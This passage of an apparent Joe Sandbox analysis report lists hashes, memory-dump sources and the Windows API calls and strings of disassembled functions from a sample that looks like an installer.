                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A18830$A122A26310A570Focus
                                                                  • String ID:
                                                                  • API String ID: 3906783838-0
                                                                  • Opcode ID: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                  • Instruction ID: 148f6e74122d55113d3717465da8055643ee1b9490db959cdfcac8ccc7d3b8de
                                                                  • Opcode Fuzzy Hash: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                  • Instruction Fuzzy Hash: FC513975A002089FDB11DFA9C881AAEBBF9FF49700F114466F904EB750D738AD40CBA8
                                                                  APIs
                                                                  • GetFocus.USER32 ref: 0041B576
                                                                  • 73A1A570.USER32(?,00000000,0041B650,?,?,?,?), ref: 0041B582
                                                                  • 73A24620.GDI32(?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B59E
                                                                  • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B5BB
                                                                  • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650), ref: 0041B5D2
                                                                  • 73A1A480.USER32(?,?,0041B62B,?,?), ref: 0041B61E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: E680$A24620A480A570Focus
                                                                  • String ID:
                                                                  • API String ID: 3709697839-0
                                                                  • Opcode ID: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                  • Instruction ID: df8759ecd31a85a201270414174f0a8fa00d18147156f7fa6755a0b35bba35d1
                                                                  • Opcode Fuzzy Hash: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                  • Instruction Fuzzy Hash: E9410831A00258AFCB10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D50CBA5
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                  • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFA4,?,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CF16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                  • API String ID: 1452528299-1580325520
                                                                  • Opcode ID: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                  • Instruction ID: 04ddcdc8736abbc18e914b4e1455ed0448250d7d0c77fa2ba5441d80ccfd4ce1
                                                                  • Opcode Fuzzy Hash: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                  • Instruction Fuzzy Hash: C7118736204304FFDB11DA91C9C2AAEB69EDB44746F6040776D00967C3D67C9F0AE56D
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BDCD
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BDD7
                                                                  • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDE1
                                                                  • 73A24620.GDI32(00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE08
                                                                  • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE15
                                                                  • 73A1A480.USER32(00000000,00000000,0041BE5B,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A24620MetricsSystem$A480A570
                                                                  • String ID:
                                                                  • API String ID: 4042297458-0
                                                                  • Opcode ID: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                  • Instruction ID: 747e2eb1a3f7a7c841cace1b59abe43854f3131f67fff351bf4eed9cd228abed
                                                                  • Opcode Fuzzy Hash: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                  • Instruction Fuzzy Hash: 98215974E00748AFEB10EFA9C942BEEBBB4EB48714F10842AF514B7280D7785D40CB69
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047DDAE
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CB69), ref: 0047DDD4
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047DDE4
                                                                  • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047DE05
                                                                  • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047DE19
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047DE35
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$Show
                                                                  • String ID:
                                                                  • API String ID: 3609083571-0
                                                                  • Opcode ID: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                  • Instruction ID: 8d1f2698ea79badf96abf755c5a3f857121e06e6ffc739f26560ae4cefe558a1
                                                                  • Opcode Fuzzy Hash: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                  • Instruction Fuzzy Hash: CA0112B5651610ABE700D768DE45F7637E8AF1C324F094266B659DF3E3C738E8408B49
                                                                  APIs
                                                                    • Part of subcall function 0041A6D8: CreateBrushIndirect.GDI32 ref: 0041A743
                                                                  • UnrealizeObject.GDI32(00000000), ref: 0041B274
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B286
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2A9
                                                                  • SetBkMode.GDI32(?,00000002), ref: 0041B2B4
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2CF
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041B2DA
                                                                    • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                  • String ID:
                                                                  • API String ID: 3527656728-0
                                                                  • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                  • Instruction ID: 416fc8ddf3b290ca22d08e3f0d0fa9d59de125dbf6d826fc2ec32e7be4b681d8
                                                                  • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                  • Instruction Fuzzy Hash: 15F072B56015009FDF00FFAAD9C6E5F67989F043197048456B948DF197C93DD8505B3A
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F1F), ref: 00455E10
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  • Opcode ID: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                                  • Instruction ID: 94d637f012244594286cd058a6e690650624bbac00cb131118490790a059a9ff
                                                                  • Opcode Fuzzy Hash: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                                  • Instruction Fuzzy Hash: F6416271A04649ABCF01EFA5C892DEEB7B8EF48304F504566E800F7292D6785E09CB68
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateFileHandle
                                                                  • String ID: -cI$.tmp$_iu
                                                                  • API String ID: 3498533004-3964432171
                                                                  • Opcode ID: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                  • Instruction ID: 987f34639f2954820d3a171204f3ba7a53f2c28fb23a6faa943e541cb6d42ed5
                                                                  • Opcode Fuzzy Hash: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                  • Instruction Fuzzy Hash: 293195B0A00249ABCB11EFA5C942BAEBBB4AF44309F60456AF800B73C2D6785F059758
                                                                  APIs
                                                                    • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  • ShowWindow.USER32(?,00000005,00000000,004974CD,?,?,00000000), ref: 0049729E
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                    • Part of subcall function 00407298: SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                                    • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                  • String ID: .dat$.msg$IMsg$Uninstall
                                                                  • API String ID: 3312786188-1660910688
                                                                  • Opcode ID: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                                  • Instruction ID: 502499af6c4fed57a8803849289841afdffa1b87ef326e8d9c35a034d288349d
                                                                  • Opcode Fuzzy Hash: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                                  • Instruction Fuzzy Hash: 20317574A10214AFCB01EF65DC92D5E7BB5FB88318B51847AF800AB792D739BD05CB58
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAD2
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAD8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB01
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                  • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                  • API String ID: 828529508-2866557904
                                                                  APIs
                                                                  • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                  • String ID: l>Y
                                                                  • API String ID: 730355536-3992852859
                                                                  APIs
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E48
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E69
                                                                  • CloseHandle.KERNEL32(?,00457E9C), ref: 00457E8F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                  • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                  • API String ID: 2573145106-3235461205
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                  • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                  • String ID: ChangeWindowMessageFilter$user32.dll
                                                                  • API String ID: 3478007392-2498399450
                                                                  APIs
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                  • String ID: AllowSetForegroundWindow$user32.dll
                                                                  • API String ID: 1782028327-3855017861
                                                                  APIs
                                                                  • BeginPaint.USER32(00000000,?), ref: 00416C4A
                                                                  • SaveDC.GDI32(?), ref: 00416C7B
                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D3D), ref: 00416CDC
                                                                  • RestoreDC.GDI32(?,?), ref: 00416D03
                                                                  • EndPaint.USER32(00000000,?,00416D44,00000000,00416D3D), ref: 00416D37
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                  • String ID:
                                                                  • API String ID: 3808407030-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429800
                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 0042982F
                                                                  • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042984B
                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429876
                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429894
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BBC2
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BBCC
                                                                  • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC0A
                                                                  • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD75,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC51
                                                                  • DeleteObject.GDI32(00000000), ref: 0041BC92
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$A26310A570DeleteObject
                                                                  • String ID:
                                                                  • API String ID: 4277397052-0
                                                                  APIs
                                                                    • Part of subcall function 0045CE6C: SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 0047344D
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 00473463
                                                                  Strings
                                                                  • Could not set permissions on the registry key because it currently does not exist., xrefs: 00473457
                                                                  • Failed to set permissions on registry key (%d)., xrefs: 00473474
                                                                  • Setting permissions on registry key: %s\%s, xrefs: 00473412
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
